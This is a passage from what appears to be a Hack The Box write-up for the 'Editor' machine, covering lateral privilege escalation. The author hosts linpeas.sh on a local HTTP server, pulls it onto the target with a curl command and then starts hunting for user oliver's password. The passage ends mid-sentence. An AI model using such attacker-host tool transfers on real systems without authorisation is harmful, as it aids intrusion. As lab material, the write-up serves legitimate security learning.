truelyyours/RTFD/htb/Editor/Solution.md

 ## Lateral Privilege Escalation

 I start by installing `linpeas.sh` on the remote host and run it.
 I installed `linpeas.sh` by exposing a `http.server` locally and then simply `curl -LO 10.10.16.16:8000/linpeas.sh`.
+While this outputs many things, I was not able to find anything directly here.
+Sad.

+Instead I noticed that within `/home` there is folder for username `oliver`.
+So, I tried finding a password.
+I had to do manual lookups and